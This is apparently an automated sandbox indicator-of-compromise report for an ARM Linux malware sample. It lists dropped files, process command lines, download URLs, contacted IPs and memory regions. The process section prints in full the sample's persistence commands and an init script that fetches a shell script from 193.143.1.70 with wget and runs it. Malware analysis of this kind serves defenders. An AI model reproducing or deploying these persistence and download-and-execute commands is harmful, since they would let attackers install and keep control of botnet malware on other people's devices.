IOC Report
arm.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm.nn.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
 malicious
/etc/init.d/arm.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.FhfHuq (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/tmp/arm.nn.elf
/tmp/arm.nn.elf
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm.nn.elf
/tmp/arm.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 38 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://193.143.1.70/curl.sh
unknown
http://193.143.1.70/lol.sh
unknown
http://193.143.1.70/
unknown

IPs

IP
Domain
Country
Malicious
190.132.118.77
unknown
Uruguay
38.35.128.74
unknown
United States
219.165.26.20
unknown
Japan
175.92.52.96
unknown
China
131.173.255.234
unknown
Germany
21.240.71.57
unknown
United States
22.162.189.68
unknown
United States
148.242.175.132
unknown
Mexico
54.203.29.0
unknown
United States
48.18.63.110
unknown
United States
56.5.113.29
unknown
United States
140.220.129.238
unknown
United States
68.170.103.133
unknown
United States
187.123.28.250
unknown
Brazil
197.95.117.30
unknown
South Africa
42.17.239.107
unknown
Korea Republic of
80.28.171.46
unknown
Spain
137.187.157.203
unknown
United States
138.29.18.213
unknown
United States
194.191.65.81
unknown
Switzerland
50.39.197.116
unknown
United States
24.75.45.147
unknown
United States
212.231.100.10
unknown
Spain
170.210.119.177
unknown
Argentina
132.231.236.64
unknown
Germany
32.16.26.40
unknown
United States
39.34.169.134
unknown
Pakistan
92.245.60.132
unknown
Russian Federation
172.110.95.37
unknown
United States
40.63.132.182
unknown
United States
212.155.241.225
unknown
France
137.29.188.180
unknown
United States
111.124.38.96
unknown
China
19.208.133.119
unknown
United States
199.182.226.144
unknown
United States
27.68.25.103
unknown
Viet Nam
49.114.122.226
unknown
China
206.155.94.64
unknown
United States
35.56.186.147
unknown
United States
158.92.141.227
unknown
Sweden
112.41.3.24
unknown
China
24.122.138.146
unknown
Canada
131.245.39.232
unknown
Australia
82.17.183.191
unknown
United Kingdom
93.39.84.169
unknown
Italy
180.23.189.177
unknown
Japan
123.229.101.225
unknown
Korea Republic of
12.127.11.232
unknown
United States
6.88.235.61
unknown
United States
175.171.12.108
unknown
China
21.187.28.99
unknown
United States
17.74.207.84
unknown
United States
112.44.116.163
unknown
China
113.113.9.224
unknown
China
222.25.244.202
unknown
China
193.143.1.59
unknown
unknown
53.206.190.247
unknown
Germany
3.139.161.212
unknown
United States
106.55.81.157
unknown
China
106.75.123.138
unknown
China
38.165.211.193
unknown
United States
13.41.197.139
unknown
United States
142.170.89.127
unknown
Canada
145.195.56.219
unknown
Netherlands
138.30.63.54
unknown
Japan
164.33.64.4
unknown
Germany
93.60.206.183
unknown
Italy
33.106.74.192
unknown
United States
26.143.11.21
unknown
United States
167.140.75.169
unknown
United States
166.29.50.50
unknown
United States
154.184.18.99
unknown
Egypt
35.111.42.51
unknown
United States
84.147.235.82
unknown
Germany
57.82.18.199
unknown
Belgium
50.8.64.167
unknown
United States
37.159.18.120
unknown
Italy
142.12.238.142
unknown
Canada
92.61.202.184
unknown
Ireland
168.6.13.141
unknown
United States
82.11.248.127
unknown
United Kingdom
103.100.113.14
unknown
Hong Kong
13.55.207.145
unknown
United States
176.28.207.168
unknown
Jordan
178.144.27.29
unknown
Belgium
139.153.203.101
unknown
United Kingdom
52.163.129.94
unknown
United States
220.92.140.24
unknown
Korea Republic of
25.44.230.215
unknown
United Kingdom
68.151.161.210
unknown
Canada
14.117.90.205
unknown
China
167.23.251.6
unknown
United States
36.135.87.105
unknown
China
8.233.18.152
unknown
United States
136.180.198.240
unknown
United States
96.79.194.193
unknown
United States
15.231.47.110
unknown
United States
75.101.142.50
unknown
United States
213.226.2.74
unknown
Bulgaria
217.193.81.217
unknown
Switzerland
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f93f4032000
page execute read
 malicious
7f93f4032000
page execute read
 malicious
7f94f4021000
page read and write
7ffdb81f9000
page read and write
7f94f3fff000
page read and write
7f94f99bc000
page read and write
556f25fe8000
page read and write
7f93f4043000
page read and write
7f94f986f000
page read and write
556f23fd3000
page read and write
7f93f403a000
page read and write
556f23fd3000
page read and write
556f23fca000
page read and write
7f94f9998000
page read and write
7f94f8d50000
page read and write
556f23fca000
page read and write
556f25fd1000
page execute and read and write
7f94f931d000
page read and write
7f94f84b6000
page read and write
7f94f9a01000
page read and write
556f23d79000
page execute read
7f94f90b2000
page read and write
7f93f403a000
page read and write
7f94f3fff000
page read and write
7f94f9340000
page read and write
7f94f84b6000
page read and write
7f94f931d000
page read and write
7ffdb81fe000
page execute read
7f94f8cbe000
page read and write
7ffdb81f9000
page read and write
7f94f8d50000
page read and write
7f94f9998000
page read and write
7f94f8cbe000
page read and write
556f2669f000
page read and write
7f94f968e000
page read and write
7f93f403e000
page read and write
7f94f99bc000
page read and write
7f94f9340000
page read and write
7f94f968e000
page read and write
7f93f403e000
page read and write
556f23d79000
page execute read
7f94f4021000
page read and write
7ffdb81fe000
page execute read
7f94f94ac000
page read and write
7f94f986f000
page read and write
556f25fe8000
page read and write
7f94f9a01000
page read and write
556f25fd1000
page execute and read and write
7f94f94ac000
page read and write
7f94f90b2000
page read and write
556f2669f000
page read and write
There are 41 hidden memdumps, click here to show them.